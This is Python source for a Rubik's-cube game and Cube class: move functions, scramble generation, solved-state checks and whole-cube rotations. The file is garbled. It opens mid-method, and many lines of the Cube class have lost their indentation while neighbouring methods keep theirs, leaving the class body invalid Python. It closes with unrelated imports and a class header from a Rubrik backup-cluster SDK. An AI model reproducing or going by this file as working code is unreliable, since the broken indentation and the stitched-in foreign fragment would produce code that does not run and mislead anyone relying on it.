        # Any non-bool assignment degrades to False rather than raising.
        if isinstance(verbose, bool):
            self.__verbose = verbose
        else:
            self.__verbose = False

    #==========================================================================
    # GAME-PLAY METHOD(s)
    #==========================================================================
    def manipulate_cube(self, cube_func : str):
        """Applies a single named move to the :attr:`game_cube` and logs it.

        Args:
            cube_func (str): Look-up key into :attr:`CUBE_FUNCS` naming
                the :class:`Cube` move to perform (e.g. ``'F'``, ``'Ri'``).
                Unknown keys are ignored, as are calls made while the cube
                is not well-formed; nothing is logged in either case.
        """
        if cube_func in Cube_Game.CUBE_FUNCS\
        and self.game_cube.is_well_formed():

            # Performs the desired cube move on the game cube
            Cube_Game.CUBE_FUNCS[cube_func](self.game_cube)

            if self.verbose:
                print(f"[DEBUG]\tCalling game cube function: '{cube_func}'")
                print(f"\t\tNum Matching Adjacent Tiles : {self.game_cube.get_num_matching_adjacent_tiles()}")

            self.game_log['events'].append({'type' : cube_func})

    # Bug fix: this function never used ``self``; without @staticmethod an
    # instance call would silently bind the instance to ``n_steps``.
    @staticmethod
    def get_scramble_sequence(n_steps : int = 50,
                              cube_funcs : List[str] = None) -> List[str]:
        """Compiles a semi-random scramble sequence of ``n_steps`` moves.

        The sequence never contains a move immediately followed by its
        inverse (per :attr:`INVERSE_FUNCS`), and never contains four
        identical moves in a row.

        Args:
            n_steps (int, optional): Number of :class:`Cube` manipulations
                to generate.  Valid range is 0 < ``n_steps`` <= 500;
                out-of-range or non-int values yield an empty sequence.
            cube_funcs (List[str], optional): Sub-list of
                :attr:`CUBE_FUNCS` keys defining the pool of candidate
                moves.  Default ``None`` allows every move.

        Returns:
            List[str]: **sequence** - A list of cube manipulation function
            str(s) for use with the :func:`manipulate_cube` function.
        """
        # Out-of-range requests degrade to an empty scramble.
        if not isinstance(n_steps, int)\
        or not (n_steps > 0 and n_steps <= 500):
            n_steps = 0

        # Default pool of candidate moves is every known move.
        if not isinstance(cube_funcs , list)\
        or not all([func in Cube_Game.CUBE_FUNCS for func in cube_funcs]):
            cube_funcs = list(Cube_Game.CUBE_FUNCS.keys())

        sequence = []
        while len(sequence) < n_steps:

            # Generates a random choice from the current options
            # of potential cube-functions to call
            choice_func = cube_funcs[randrange(len(cube_funcs))]

            if len(sequence) == 0:
                sequence.append(choice_func)
            else:
                last_func = sequence[-1]

                # No <<FUNCTION>> , <<INVERSE_FUNCTION>> sub-sequences
                if last_func == Cube_Game.INVERSE_FUNCS[choice_func]:
                    continue

                if len(sequence) > 2:
                    last_three = sequence[-3:]

                    # No 4 of the same function in a row
                    if all([func == choice_func for func in last_three]):
                        continue

                sequence.append(choice_func)

        return sequence

    def compute_inverse_log_sequence(self) -> List[str]:
        """Computes the inverse sequence of moves from the :attr:`game_log`
        that ``SHOULD`` lead to the :class:`Rubix Cube <rubix_cube.cube.Cube>`
        being solved!

        Returns:
            List[str]: **sequence** - A list of cube manipulation function
            str(s) for use with the :func:`manipulate_cube` function.
            Empty when the cube or log is invalid (previously an implicit
            ``None``, violating the declared return type).
        """
        # Ensures the game is valid
        if not (self.game_cube.is_well_formed()
                and isinstance(self.game_log, dict)
                and 'events' in self.game_log):
            return []

        # Walks the log newest-to-oldest, keeps only cube moves, and maps
        # each move to its inverse.
        return [Cube_Game.INVERSE_FUNCS[event['type']]
                for event in reversed(self.game_log['events'])
                if event['type'] in Cube_Game.INVERSE_FUNCS]
import os
import sys
import json
import copy
import warnings
from typing import List, Tuple, Dict
import numpy as np
from matplotlib.colors import is_color_like
class Cube(object):
"""Data structure for representing a 3x3x3 rubix-cube.
Attributes:
__colors (Dict[str,str]): Dictionary of HEX colors that define the
rendering of the :class:`Cube`'s tile coloring.
__faces (Dict[str,np.ndarray]): Dictionary of
:class:`numpy arrays <numpy.ndarray>` that define the rendering of
the :class:`Cube`'s tile configuration.
"""
#==========================================================================
# CLASS CONSTRUCTOR
#==========================================================================
def __init__(self,
colors : Dict[str,str] = None,
faces : Dict[str,np.array] = None):
""":class:`Cube` class constructor.
Args:
colors (Dict[str,str], optional): Dictionary of color HEX strings.
Default value is ``None`` which will create a cube with default
colors :attr:`DEFAULT_FACE_COLORS`.
.. code-block::
:name: init_colors_keys
:linenos:
:caption: Required ``colors`` dictionary keys.
colors = {'UP_COLOR' : ...,
'DOWN_COLOR' : ...,
'FRONT_COLOR' : ...,
'BACK_COLOR' : ...,
'LEFT_COLOR' : ...,
'RIGHT_COLOR' : ...
}
All colors passed as values must return ``True`` when examined
by :func:`matplotlib.colors.is_color_like`.
faces (Dict[str,np.array], optional): Dictionary of face names to
3x3 arrays of the the tile face values. Default value is
``None`` which will create a solved cube with default colors.
.. code-block::
:name: init_faces_keys
:linenos:
:caption: Required ``faces`` dictionary keys.
faces = {'UP_FACE' : ...,
'DOWN_FACE' : ...,
'FRONT_FACE' : ...,
'BACK_FACE' : ...,
'LEFT_FACE' : ...,
'RIGHT_FACE' : ...
}
All faces passed as value must be 3x3
:class:`numpy arrays <numpy.ndarray>` with each element
returning ``True`` when examined by
:func:`matplotlib.colors.is_color_like`.
"""
# Sets private attributes via properties
self.colors = Cube.DEFAULT_FACE_COLORS
self.faces = Cube.DEFAULT_FACES
if isinstance(colors, dict):
self.colors = colors
if isinstance(faces, dict):
self.faces = faces
#==========================================================================
# OVERLOADED OPERATOR(s)
#==========================================================================
def __eq__(self, other) -> bool:
"""Tests if the :class:`Rubix Cube <rubix_cube.cube.Cube>` faces are
exactly identical between the two objects.
Args:
other (TYPE): Description
Returns:
bool: Description
"""
if self.is_well_formed()\
and isinstance(other , self.__class__)\
and other.is_well_formed():
for face , other_face in zip(self.faces , other.faces):
if not np.array_equal(self.faces[face],other.faces[other_face]):
return False
return True
else:
return False
def __ne__(self, other) -> bool:
"""Tests if the :class:`Rubix Cube <rubix_cube.cube.Cube>` faces are
``NOT`` exactly identical between the two objects.
Args:
other (TYPE): Description
Returns:
bool: Description
"""
return not (self == other)
    def __mod__(self, other) -> bool:
        """Tests if the :class:`Rubix Cube <rubix_cube.cube.Cube>` faces are
        exactly identical between the two objects after re-orientation.
        Essentially are the cubes identical after rotation?

        Operator alias so that ``a % b`` delegates to
        :func:`is_equivalent_to`.

        Args:
            other: Object compared against this :class:`Cube`.

        Returns:
            bool: ``True`` when ``other`` matches this cube under some
            whole-cube rotation, ``False`` otherwise.
        """
        return self.is_equivalent_to(other)
    def is_equivalent_to(self, other) -> bool:
        """Tests whether ``other`` matches this cube under some whole-cube
        rotation (i.e. the cubes are identical up to orientation).

        After an initial exact comparison, each rotation sequence below is
        replayed on a deep copy of ``other``, re-testing for an exact
        match after every single rotation step.

        Args:
            other: Object compared against this :class:`Cube`.

        Returns:
            bool: ``True`` when both cubes are well-formed and some
            re-orientation of ``other`` is face-for-face identical to
            this cube, ``False`` otherwise (including when either cube is
            malformed).
        """
        if self.is_well_formed()\
        and isinstance(other , self.__class__)\
        and other.is_well_formed():

            # Each list is a cumulative rotation walk; testing after every
            # step visits the remaining orientations of the cube.
            other_test_seqs = [[Cube.rotate_roll,
                                Cube.rotate_roll,
                                Cube.rotate_roll],
                               [Cube.rotate_yaw,
                                Cube.rotate_roll,
                                Cube.rotate_roll,
                                Cube.rotate_roll],
                               [Cube.rotate_yaw,
                                Cube.rotate_yaw,
                                Cube.rotate_roll,
                                Cube.rotate_roll,
                                Cube.rotate_roll],
                               [Cube.rotate_yaw_inverse,
                                Cube.rotate_roll,
                                Cube.rotate_roll,
                                Cube.rotate_roll],
                               [Cube.rotate_pitch,
                                Cube.rotate_roll,
                                Cube.rotate_roll,
                                Cube.rotate_roll],
                               [Cube.rotate_pitch_inverse,
                                Cube.rotate_roll,
                                Cube.rotate_roll,
                                Cube.rotate_roll]]

            # Tests if exact match
            if self.__eq__(other):
                return True

            # Tests the 24 sequences of re-orientations for exact matches
            for seq in other_test_seqs:

                # Makes a local copy to manipulate
                l_other = copy.deepcopy(other)

                # Performs each move
                for mv in seq:
                    mv(l_other)

                    # Tests for exact match
                    if self.__eq__(l_other):
                        return True

        return False
#==========================================================================
# PROPERTY INTERFACE(s)
#==========================================================================
    @property
    def colors(self):
        """Can only be set to be a dictionary with 6 unique color string values
        that all return ``True`` when examined by
        :func:`matplotlib.colors.is_color_like`.  Assignments that fail
        validation are silently ignored, leaving the previous palette in
        place.

        .. code-block::
            :name: colors_keys
            :linenos:
            :caption: Required ``colors`` dictionary keys.

            colors = {'UP_COLOR'    : ...,
                      'DOWN_COLOR'  : ...,
                      'FRONT_COLOR' : ...,
                      'BACK_COLOR'  : ...,
                      'LEFT_COLOR'  : ...,
                      'RIGHT_COLOR' : ...
                     }
        """
        return self.__colors

    @colors.setter
    def colors(self, colors : Dict[str,str]):

        required_keys = ['UP_COLOR',
                         'DOWN_COLOR',
                         'FRONT_COLOR',
                         'BACK_COLOR',
                         'LEFT_COLOR',
                         'RIGHT_COLOR']

        # Silently ignore anything that is not a dict with all six keys.
        if isinstance(colors, dict)\
        and all([key in colors for key in required_keys]):

            # NOTE(review): routing values through np.array means the
            # stored palette entries are numpy str_ scalars, not plain str.
            set_colors = np.array([colors[key] for key in required_keys])

            if all([is_color_like(color) for color in set_colors]):
                self.__colors = dict(zip(required_keys , set_colors))
    @property
    def faces(self) -> Dict[str,np.ndarray]:
        """Can only be set to be a dictionary of 6 strings mapped to the faces
        of a Rubix Cube. Each value must be a 3x3
        :class:`numpy array <numpy.ndarray>` of values all of which are valid
        colors that can be found within the :attr:`colors` attribute.
        Assignments that fail validation are silently ignored.

        .. code-block::
            :name: faces_keys
            :linenos:
            :caption: Required ``faces`` dictionary keys.

            faces = {'UP_FACE'    : ...,
                     'DOWN_FACE'  : ...,
                     'FRONT_FACE' : ...,
                     'BACK_FACE'  : ...,
                     'LEFT_FACE'  : ...,
                     'RIGHT_FACE' : ...
                    }
        """
        return self.__faces

    @faces.setter
    def faces(self, faces : Dict[str,np.ndarray]):

        required_keys = ['UP_FACE',
                         'DOWN_FACE',
                         'FRONT_FACE',
                         'BACK_FACE',
                         'LEFT_FACE',
                         'RIGHT_FACE']

        # Silently ignore anything that is not a dict with all six keys.
        if isinstance(faces, dict)\
        and all([key in faces for key in required_keys]):

            # Stacks the six 3x3 faces into one 6x3x3 array; iterating it
            # below yields one face per required key, in order.
            set_faces = np.array([faces[key] for key in required_keys])

            if all([self.is_valid_face(face) for face in set_faces]):
                self.__faces = dict(zip(required_keys , set_faces))
#==========================================================================
# QUALITY ASSURANCE METHOD(s)
#==========================================================================
def is_well_formed(self) -> bool:
"""Quality control method to ensure class has been properly
initialized by examining all :attr:`faces` via the quality control
method :func:`is_valid_face`.
Returns:
``True`` if all faces are 3 x 3 arrays of valid colors
as defined by :func:`matplotlib.colors.is_color_like`,
``False`` otherwise.
"""
required_keys = ['UP_FACE',
'DOWN_FACE',
'FRONT_FACE',
'BACK_FACE',
'LEFT_FACE',
'RIGHT_FACE']
try:
return all([self.is_valid_face(self.faces[face])
for face in required_keys])
except KeyError:
return False
def is_valid_face(self, face : np.ndarray) -> bool:
"""Checks if the provided array could be a valid face on the
currently initialized :class:`Cube`.
Args:
face (np.ndarray): Array to be tested for being valid in the
context of the current :class:`Cube`.
Returns:
``True`` if faces is 3 x 3 array of valid colors as defined by
current instance's :attr:`colors` attribute, ``False`` otherwise.
"""
if isinstance(face, np.ndarray)\
and face.shape == (3,3)\
and all([all([val in self.colors.values()
for val in row])
for row in face]):
return True
else:
return False
#==========================================================================
# SOLUTION CHECKING METHOD(s)
#==========================================================================
def is_solved_face(self, face: np.ndarray) -> bool:
"""Checks if the provided array could be a valid face on the
currently initialized :class:`Cube`.
Args:
face (np.ndarray): Array to be tested for being solved in the
context of the current :class:`Cube`.
Returns:
``True`` if faces is solved 3 x 3 array of valid colors as defined
by current instance's :attr:`colors` attribute, ``False``
otherwise.
.. code-block::
:name: is_solved_face
:linenos:
:caption: A solved ``face`` returns ``True`` when examined by
:func:`is_valid_face` and only contains 1 unique value.
return len(np.unique(face) == 1)
"""
if not self.is_valid_face(face):
return False
else:
return len(np.unique(face)) == 1
def get_num_solved_faces(self) -> int:
"""Counts the number of solved faces by examining each one using
:func:`is_solved_face` if the currently initialized :class:`Cube`
:func:`is_well_formed`, 0 otherwise.
Returns:
int: **num_faces_solved** - The number of solved faces on the
currently initialized :class:`Cube`.
"""
num_faces_solved = 0
if self.is_well_formed():
for face in self.faces.values():
if self.is_solved_face(face):
num_faces_solved += 1
return num_faces_solved
def is_solved(self) -> bool:
"""Calls :func:`get_num_solved_faces` to check if all faces of the
:class:`Cube` are solved.
Returns:
bool: Value representing if all faces
are solved completely.
.. code-block::
:name: is_solved
:linenos:
:caption: Checks to see if the number of solved faces is 6.
return (self.get_num_solved_faces() == 6)
"""
return (self.get_num_solved_faces() == 6)
def get_num_matching_adjacent_tiles_face(self, face : np.ndarray) -> int:
"""Counts the number of tiles on the current face that are adjacent
and have the same color values.
Args:
face (np.ndarray): Array to be tested for being solved in the
context of the current :class:`Cube`.
Returns:
int: **num_match_adj_tiles** - The number of tiles on the given
``face`` that are adjacent (same row XOR same column) and have
the same color valus.
"""
# Ensures dealing with valid face
if self.is_valid_face(face):
num_match_adj_tiles = 0
# Iterates over each tile in the cube
for r_idx , row in enumerate(face):
for c_idx , col in enumerate(row):
neighbors = list()
if r_idx > 0:
neighbors.append(face[r_idx - 1, c_idx]) # Tile above
if r_idx < 2:
neighbors.append(face[r_idx + 1, c_idx]) # Tile below
if c_idx > 0:
neighbors.append(face[r_idx, c_idx - 1]) # Tile left
if c_idx < 2:
neighbors.append(face[r_idx, c_idx + 1]) # Tile right
if any([face[r_idx, c_idx] == c for c in neighbors]):
num_match_adj_tiles += 1
return num_match_adj_tiles
def get_num_matching_adjacent_tiles(self) -> int:
"""Counts the number of tiles on the :class:`Cube` that are adjacent
and have the same color values. Uses successive calls to
:func:`get_num_matching_adjacent_tiles_face` for every face.
Returns:
int: **num_match_adj_tiles** - The number of tiles on the given
:class:`Cube` that are adjacent (same row XOR same column) and have
the same color valus.
"""
num_match_adj_tiles = 0
if self.is_well_formed():
for face in self.faces.values():
if self.is_valid_face(face):
num_match_adj_tiles += self.get_num_matching_adjacent_tiles_face(face)
return num_match_adj_tiles
#==========================================================================
# MOVE METHOD(s)
#==========================================================================
    def move_up(self):
        """Up Move (``U``): quarter-turn of the top layer.

        Rotates the UP face in place and cycles the top rows (row 0) of
        the side faces: FRONT -> LEFT -> BACK -> RIGHT -> FRONT.
        No-op when the cube is not well-formed.
        """
        if self.is_well_formed():
            self.faces['UP_FACE'] = np.rot90(self.faces['UP_FACE'],
                                             axes=(1,0))
            # ``temp`` keeps BACK's top row alive while the 4-cycle shifts.
            temp = self.faces['BACK_FACE'][0,:].copy()
            self.faces['BACK_FACE'][0,:] = self.faces['LEFT_FACE'][0,:]
            self.faces['LEFT_FACE'][0,:] = self.faces['FRONT_FACE'][0,:]
            self.faces['FRONT_FACE'][0,:] = self.faces['RIGHT_FACE'][0,:]
            self.faces['RIGHT_FACE'][0,:] = temp

    def move_up_inverse(self):
        """Up Inverse Move (``Ui``): undoes :func:`move_up`.

        Rotates the UP face the opposite way and cycles the top rows:
        FRONT -> RIGHT -> BACK -> LEFT -> FRONT.
        """
        if self.is_well_formed():
            self.faces['UP_FACE'] = np.rot90(self.faces['UP_FACE'])
            temp = self.faces['BACK_FACE'][0,:].copy()
            self.faces['BACK_FACE'][0,:] = self.faces['RIGHT_FACE'][0,:]
            self.faces['RIGHT_FACE'][0,:] = self.faces['FRONT_FACE'][0,:]
            self.faces['FRONT_FACE'][0,:] = self.faces['LEFT_FACE'][0,:]
            self.faces['LEFT_FACE'][0,:] = temp

    def move_down(self):
        """Down Move (``D``): quarter-turn of the bottom layer.

        Rotates the DOWN face in place and cycles the bottom rows (row 2)
        of the side faces: FRONT -> RIGHT -> BACK -> LEFT -> FRONT.
        """
        if self.is_well_formed():
            self.faces['DOWN_FACE'] = np.rot90(self.faces['DOWN_FACE'])
            temp = self.faces['FRONT_FACE'][2,:].copy()
            self.faces['FRONT_FACE'][2,:] = self.faces['LEFT_FACE'][2,:]
            self.faces['LEFT_FACE'][2,:] = self.faces['BACK_FACE'][2,:]
            self.faces['BACK_FACE'][2,:] = self.faces['RIGHT_FACE'][2,:]
            self.faces['RIGHT_FACE'][2,:] = temp

    def move_down_inverse(self):
        """Down Inverse Move (``Di``): undoes :func:`move_down`.

        Cycles the bottom rows: FRONT -> LEFT -> BACK -> RIGHT -> FRONT.
        """
        if self.is_well_formed():
            self.faces['DOWN_FACE'] = np.rot90(self.faces['DOWN_FACE'],
                                               axes=(1,0))
            temp = self.faces['FRONT_FACE'][2,:].copy()
            self.faces['FRONT_FACE'][2,:] = self.faces['RIGHT_FACE'][2,:]
            self.faces['RIGHT_FACE'][2,:] = self.faces['BACK_FACE'][2,:]
            self.faces['BACK_FACE'][2,:] = self.faces['LEFT_FACE'][2,:]
            self.faces['LEFT_FACE'][2,:] = temp
    def move_front(self):
        """Front Move (``F``): quarter-turn of the front layer.

        Rotates the FRONT face in place and cycles the ring of strips
        bordering it (UP row 2 -> RIGHT col 0 -> DOWN row 0 ->
        LEFT col 2 -> UP row 2), flipping strips where row and column
        orientations differ.  No-op when the cube is not well-formed.
        """
        if self.is_well_formed():
            self.faces['FRONT_FACE'] = np.rot90(self.faces['FRONT_FACE'],
                                                axes=(1,0))
            # ``temp`` keeps UP's bottom row alive while the ring shifts.
            temp = self.faces['UP_FACE'][2,:].copy()
            self.faces['UP_FACE'][2,:] = np.flip(self.faces['LEFT_FACE'][:,2])
            self.faces['LEFT_FACE'][:,2] = self.faces['DOWN_FACE'][0,:]
            self.faces['DOWN_FACE'][0,:] = np.flip(self.faces['RIGHT_FACE'][:,0])
            self.faces['RIGHT_FACE'][:,0] = temp

    def move_front_inverse(self):
        """Front Inverse Move (``Fi``): undoes :func:`move_front`.

        Cycles the same ring of strips in the opposite direction
        (UP row 2 -> LEFT col 2 -> DOWN row 0 -> RIGHT col 0 -> UP row 2).
        """
        if self.is_well_formed():
            self.faces['FRONT_FACE'] = np.rot90(self.faces['FRONT_FACE'])
            temp = self.faces['UP_FACE'][2,:].copy()
            self.faces['UP_FACE'][2,:] = self.faces['RIGHT_FACE'][:,0]
            self.faces['RIGHT_FACE'][:,0] = np.flip(self.faces['DOWN_FACE'][0,:])
            self.faces['DOWN_FACE'][0,:] = self.faces['LEFT_FACE'][:,2]
            self.faces['LEFT_FACE'][:,2] = np.flip(temp)

    def move_back(self):
        """Back Move (``B``): quarter-turn of the back layer.

        Rotates the BACK face in place and cycles the ring of strips
        bordering it (UP row 0, LEFT col 0, DOWN row 2, RIGHT col 2),
        flipping strips where row and column orientations differ.
        """
        if self.is_well_formed():
            self.faces['BACK_FACE'] = np.rot90(self.faces['BACK_FACE'],
                                               axes=(1,0))
            temp = self.faces['DOWN_FACE'][2,:].copy()
            self.faces['DOWN_FACE'][2,:] = self.faces['LEFT_FACE'][:,0]
            self.faces['LEFT_FACE'][:,0] = np.flip(self.faces['UP_FACE'][0,:])
            self.faces['UP_FACE'][0,:] = self.faces['RIGHT_FACE'][:,2]
            self.faces['RIGHT_FACE'][:,2] = np.flip(temp)

    def move_back_inverse(self):
        """Back Inverse Move (``Bi``): undoes :func:`move_back`.

        Cycles the same ring of strips in the opposite direction.
        """
        if self.is_well_formed():
            self.faces['BACK_FACE'] = np.rot90(self.faces['BACK_FACE'])
            temp = self.faces['DOWN_FACE'][2,:].copy()
            self.faces['DOWN_FACE'][2,:] = np.flip(self.faces['RIGHT_FACE'][:,2])
            self.faces['RIGHT_FACE'][:,2] = self.faces['UP_FACE'][0,:]
            self.faces['UP_FACE'][0,:] = np.flip(self.faces['LEFT_FACE'][:,0])
            self.faces['LEFT_FACE'][:,0] = temp
    def move_left(self):
        """Left Move (``L``): quarter-turn of the left layer.

        Rotates the LEFT face in place and cycles the left-hand vertical
        strips: UP col 0 -> FRONT col 0 -> DOWN col 0 -> BACK col 2 ->
        UP col 0, flipping at the BACK seam where column orientations
        differ.  No-op when the cube is not well-formed.
        """
        if self.is_well_formed():
            self.faces['LEFT_FACE'] = np.rot90(self.faces['LEFT_FACE'],
                                               axes=(1,0))
            # ``temp`` keeps DOWN's left column alive while the cycle shifts.
            temp = self.faces['DOWN_FACE'][:,0].copy()
            self.faces['DOWN_FACE'][:,0] = self.faces['FRONT_FACE'][:,0]
            self.faces['FRONT_FACE'][:,0] = self.faces['UP_FACE'][:,0]
            self.faces['UP_FACE'][:,0] = np.flip(self.faces['BACK_FACE'][:,2])
            self.faces['BACK_FACE'][:,2] = np.flip(temp)

    def move_left_inverse(self):
        """Left Inverse Move (``Li``): undoes :func:`move_left`.

        Cycles the same strips in the opposite direction:
        UP col 0 -> BACK col 2 -> DOWN col 0 -> FRONT col 0 -> UP col 0.
        """
        if self.is_well_formed():
            self.faces['LEFT_FACE'] = np.rot90(self.faces['LEFT_FACE'])
            temp = self.faces['DOWN_FACE'][:,0].copy()
            self.faces['DOWN_FACE'][:,0] = np.flip(self.faces['BACK_FACE'][:,2])
            self.faces['BACK_FACE'][:,2] = np.flip(self.faces['UP_FACE'][:,0])
            self.faces['UP_FACE'][:,0] = self.faces['FRONT_FACE'][:,0]
            self.faces['FRONT_FACE'][:,0] = temp

    def move_right(self):
        """Right Move (``R``): quarter-turn of the right layer.

        Rotates the RIGHT face in place and cycles the right-hand
        vertical strips: FRONT col 2 -> UP col 2 -> BACK col 0 ->
        DOWN col 2 -> FRONT col 2, flipping at the BACK seam.
        """
        if self.is_well_formed():
            self.faces['RIGHT_FACE'] = np.rot90(self.faces['RIGHT_FACE'],
                                                axes=(1,0))
            temp = self.faces['UP_FACE'][:,2].copy()
            self.faces['UP_FACE'][:,2] = self.faces['FRONT_FACE'][:,2]
            self.faces['FRONT_FACE'][:,2] = self.faces['DOWN_FACE'][:,2]
            self.faces['DOWN_FACE'][:,2] = np.flip(self.faces['BACK_FACE'][:,0])
            self.faces['BACK_FACE'][:,0] = np.flip(temp)

    def move_right_inverse(self):
        """Right Inverse Move (``Ri``): undoes :func:`move_right`.

        Cycles the same strips in the opposite direction.
        """
        if self.is_well_formed():
            self.faces['RIGHT_FACE'] = np.rot90(self.faces['RIGHT_FACE'])
            temp = self.faces['UP_FACE'][:,2].copy()
            self.faces['UP_FACE'][:,2] = np.flip(self.faces['BACK_FACE'][:,0])
            self.faces['BACK_FACE'][:,0] = np.flip(self.faces['DOWN_FACE'][:,2])
            self.faces['DOWN_FACE'][:,2] = self.faces['FRONT_FACE'][:,2]
            self.faces['FRONT_FACE'][:,2] = temp
def move_middle(self):
"""Middle Slice Move
"""
if self.is_well_formed():
temp = self.faces['DOWN_FACE'][:,1].copy()
self.faces['DOWN_FACE'][:,1] = self.faces['FRONT_FACE'][:,1]
self.faces['FRONT_FACE'][:,1] = self.faces['UP_FACE'][:,1]
self.faces['UP_FACE'][:,1] = np.flip(self.faces['BACK_FACE'][:,1])
self.faces['BACK_FACE'][:,1] = np.flip(temp)
def move_middle_inverse(self):
"""Middle Slice Inverse Move
"""
if self.is_well_formed():
temp = self.faces['DOWN_FACE'][:,1].copy()
self.faces['DOWN_FACE'][:,1] = np.flip(self.faces['BACK_FACE'][:,1])
self.faces['BACK_FACE'][:,1] = np.flip(self.faces['UP_FACE'][:,1])
self.faces['UP_FACE'][:,1] = self.faces['FRONT_FACE'][:,1]
self.faces['FRONT_FACE'][:,1] = temp
def move_equator(self):
"""Equator Slice Move
"""
if self.is_well_formed():
temp = self.faces['FRONT_FACE'][1,:].copy()
self.faces['FRONT_FACE'][1,:] = self.faces['LEFT_FACE'][1,:]
self.faces['LEFT_FACE'][1,:] = self.faces['BACK_FACE'][1,:]
self.faces['BACK_FACE'][1,:] = self.faces['RIGHT_FACE'][1,:]
self.faces['RIGHT_FACE'][1,:] = temp
def move_equator_inverse(self):
"""Equator Slice Inverse Move
"""
if self.is_well_formed():
temp = self.faces['FRONT_FACE'][1,:].copy()
self.faces['FRONT_FACE'][1,:] = self.faces['RIGHT_FACE'][1,:]
self.faces['RIGHT_FACE'][1,:] = self.faces['BACK_FACE'][1,:]
self.faces['BACK_FACE'][1,:] = self.faces['LEFT_FACE'][1,:]
self.faces['LEFT_FACE'][1,:] = temp
def move_standing(self):
    """Standing Slice Move

    Rotates the slice between the FRONT and BACK faces, cycling the
    centre row of UP/DOWN with the centre column of LEFT/RIGHT.
    """
    # Only mutate state when the cube passes its internal consistency check.
    if self.is_well_formed():
        # UP row <- LEFT column (reversed), LEFT column <- DOWN row,
        # DOWN row <- RIGHT column (reversed), RIGHT column <- old UP row.
        # Rows ([1,:]) are exchanged with columns ([:,1]) because the
        # slice crosses UP/DOWN horizontally but LEFT/RIGHT vertically;
        # np.flip corrects the traversal direction at those hand-offs.
        temp = self.faces['UP_FACE'][1,:].copy()
        self.faces['UP_FACE'][1,:] = np.flip(self.faces['LEFT_FACE'][:,1])
        self.faces['LEFT_FACE'][:,1] = self.faces['DOWN_FACE'][1,:]
        self.faces['DOWN_FACE'][1,:] = np.flip(self.faces['RIGHT_FACE'][:,1])
        self.faces['RIGHT_FACE'][:,1] = temp
def move_standing_inverse(self):
    """Standing Slice Inverse Move

    Undoes move_standing: cycles the centre row of UP/DOWN with the
    centre column of LEFT/RIGHT in the opposite direction.
    """
    # Only mutate state when the cube passes its internal consistency check.
    if self.is_well_formed():
        # UP row <- RIGHT column, RIGHT column <- DOWN row (reversed),
        # DOWN row <- LEFT column, LEFT column <- old UP row (reversed).
        # The flips mirror the ones applied in move_standing so that the
        # two methods are exact inverses of each other.
        temp = self.faces['UP_FACE'][1,:].copy()
        self.faces['UP_FACE'][1,:] = self.faces['RIGHT_FACE'][:,1]
        self.faces['RIGHT_FACE'][:,1] = np.flip(self.faces['DOWN_FACE'][1,:])
        self.faces['DOWN_FACE'][1,:] = self.faces['LEFT_FACE'][:,1]
        self.faces['LEFT_FACE'][:,1] = np.flip(temp)
def rotate_pitch(self):
    """Pitch Rotation

    Turns the entire cube about its pitch axis by composing the
    L', M' and R moves in order.
    """
    if not self.is_well_formed():
        return
    for turn in (self.move_left_inverse, self.move_middle_inverse, self.move_right):
        turn()
def rotate_pitch_inverse(self):
    """Pitch Inverse Rotation

    Turns the entire cube about its pitch axis in the opposite
    direction by composing the L, M and R' moves in order.
    """
    if not self.is_well_formed():
        return
    for turn in (self.move_left, self.move_middle, self.move_right_inverse):
        turn()
def rotate_roll(self):
    """Roll Rotation

    Turns the entire cube about its roll axis by composing the
    F, S and B' moves in order.
    """
    if not self.is_well_formed():
        return
    for turn in (self.move_front, self.move_standing, self.move_back_inverse):
        turn()
def rotate_roll_inverse(self):
    """Roll Inverse Rotation

    Turns the entire cube about its roll axis in the opposite
    direction by composing the F', S' and B moves in order.
    """
    if not self.is_well_formed():
        return
    for turn in (self.move_front_inverse, self.move_standing_inverse, self.move_back):
        turn()
def rotate_yaw(self):
    """Yaw Rotation

    Turns the entire cube about its yaw axis by composing the
    U, E' and D' moves in order.
    """
    if not self.is_well_formed():
        return
    for turn in (self.move_up, self.move_equator_inverse, self.move_down_inverse):
        turn()
def rotate_yaw_inverse(self):
    """Yaw Inverse Rotation

    Turns the entire cube about its yaw axis in the opposite
    direction by composing the U', E and D moves in order.
    """
    if not self.is_well_formed():
        return
    for turn in (self.move_up_inverse, self.move_equator, self.move_down):
        turn()
#==========================================================================
# CONSTANTS FOR DEFAULT CUBE-COLORS
#==========================================================================
# Hex color codes for the six faces of a default (solved) cube.
DEFAULT_UP_COLOR = '#ffffff' # White
DEFAULT_DOWN_COLOR = '#ffd500' # Cyber Yellow
DEFAULT_FRONT_COLOR = '#009b48' # Green (Pigment)
DEFAULT_BACK_COLOR = '#0045ad' # Cobalt Blue
DEFAULT_LEFT_COLOR = '#ff5900' # Orange (Pantone)
DEFAULT_RIGHT_COLOR = '#b90000' # UE Red

# Lookup of the default hex color for each face key.
DEFAULT_FACE_COLORS = {
    'UP_COLOR' : DEFAULT_UP_COLOR,
    'DOWN_COLOR' : DEFAULT_DOWN_COLOR,
    'FRONT_COLOR' : DEFAULT_FRONT_COLOR,
    'BACK_COLOR' : DEFAULT_BACK_COLOR,
    'LEFT_COLOR' : DEFAULT_LEFT_COLOR,
    'RIGHT_COLOR' : DEFAULT_RIGHT_COLOR
}

# 3x3 sticker arrays, one per face, each filled with that face's color.
DEFAULT_UP_FACE = np.full((3,3), DEFAULT_UP_COLOR)
DEFAULT_DOWN_FACE = np.full((3,3), DEFAULT_DOWN_COLOR)
DEFAULT_FRONT_FACE = np.full((3,3), DEFAULT_FRONT_COLOR)
DEFAULT_BACK_FACE = np.full((3,3), DEFAULT_BACK_COLOR)
DEFAULT_LEFT_FACE = np.full((3,3), DEFAULT_LEFT_COLOR)
DEFAULT_RIGHT_FACE = np.full((3,3), DEFAULT_RIGHT_COLOR)

# Default faces dictionary in the same shape as Cube.faces.
# NOTE(review): these ndarrays are shared singletons and np.ndarray is
# mutable — callers that use DEFAULT_FACES as an initial cube state should
# take copies first; confirm call sites do so.
DEFAULT_FACES = {
    'UP_FACE' : DEFAULT_UP_FACE,
    'DOWN_FACE' : DEFAULT_DOWN_FACE,
    'FRONT_FACE' : DEFAULT_FRONT_FACE,
    'BACK_FACE' : DEFAULT_BACK_FACE,
    'LEFT_FACE' : DEFAULT_LEFT_FACE,
    'RIGHT_FACE' : DEFAULT_RIGHT_FACE
}
import re
from datetime import datetime
from .api import Api
from .exceptions import CDMVersionException, InvalidParameterException, InvalidTypeException, APICallException
import inspect
class Data_Management(Api):
"""This class contains methods related to backup and restore operations for the various objects managed by the Rubrik cluster."""
